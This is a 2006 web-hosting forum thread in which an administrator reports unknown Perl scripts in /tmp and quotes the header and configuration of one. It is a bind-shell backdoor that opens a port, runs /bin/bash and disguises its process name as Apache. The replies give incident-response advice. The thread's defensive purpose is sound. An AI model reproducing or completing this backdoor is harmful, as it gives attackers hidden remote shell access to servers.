1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice
  3. Dear Pleskians, I really hope that you will share your opinion in this Special topic for chatter about Plesk in the Clouds. Thank you!
    Dismiss Notice

Hackers putting scripts in /tmp

Discussion in 'Plesk for Linux - 8.x and Older' started by cartoon, Jun 4, 2006.

  1. cartoon

    cartoon Guest

    0
     
    I have seen that some processes are taking a lot of resources on one of my servers lately. Today I was looking at this and found two scripts in /tmp ( sem.perl and qmail.pl ) I am not sure what they do but I can not find the scripts in any cgi-bin folder for any of the sites running on the server. I am running Freebsd 5.3 with Plesk 7.5 and perl5.8.7 . Have searched the complete server for files including the e-mails adresses in the scripts but cant find it anywhere without in the /tmp folder.

    Anyone can point me in the right direction to find out how the scripts come in to the server?

    The script start with the following ( if of interest for anyone to take a closer look and find out what it does I can post the complete script later.:

    #!/usr/bin/perl
    # Telnet-like Standard Daemon 1.0
    #
    # Dark_Anjo - dark_anjo666@hotmail.com
    # - dark_anjo@nucleozero.com.br
    # - www.xn.rg3.net
    # - www.red.not.br/xn
    #
    # For those guys that still like to open ports
    # and use non-rooted boxes
    #
    # This has been developed to join in the TocToc
    # project code, now it's done and I'm distributing
    # this separated
    #
    # This one i made without IO::pty so it uses
    # only standard modules... enjoy it
    #
    # tested on linux boxes.. probably will work fine on others
    # any problem... #expl0its@irc.brasnet.org
    #

    ##########################################################
    # ******************* CONFIGURATION ******************** #
    ##########################################################
    my $PORT = $ARGV[0] || 3847; # default port is 54545
    my $PASS = ''; # encripted password
    my $SHELL = "/bin/bash"; # shell to be executed
    my $HOME = "/tmp"; # your HOME
    my $PROC = "/usr/local/apache/bin/httpd -DSSL"; # name of the process
    my $PASS_PROMPT = "Password: "; # password prompt
    my $WRONG_PASS = "Wrong password!"; # "wrong password" message
    my @STTY = ('sane', 'dec'); # stty arguments
    ##########################################################

    # feel free to change the ENV
    #### ENVironment ####
    $ENV{HOME} = $HOME;
    #$ENV{PS1} = '[\u@\h \W]: '; # the way i like :)
    # colorful PS1 is also funny :)
    $ENV{PS1} = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] ';
    $ENV{MAIL} = '/var/mail/root';
     
  2. wagnerch

    wagnerch Guest

    0
     
    One of your domains has a vulnerable web application. Try correlating the creation time or modification time (use "stat") of the files to the Apache access_logs. The events in the access logs may be a few seconds earlier than the creation/modification time of the files.

    Some very popular web applications are vulnerable to remote code inclusion/code execution vulnerabilities like Mambo, phpBB2, phpAds, PostNuke, etc etc.

    You should also take a look at your mail queue, I am sure they were locally injecting spam into the queue. Use "qmail-qstat" to inspect the queue sizes (it is located in /var/qmail/bin on FC Linux, not sure where it is under FreeBSD).

    A preventative measure that you can take is installed modsecurity, it helps prevent some attacks but requires alot of tuning and updating of rulesets.
     
  3. cartoon

    cartoon Guest

    0
     
    Thank you. The scripts has been there since the middle of april. Have closed the ports the scripts are using in the FW and monitoring the server to try to catch them and see how the scripts are comming in the next time. There was not an big mailque now. On FreeBsd /usr/local/psa/qmail/bin/qmail-qstat to see the queue.
     
Loading...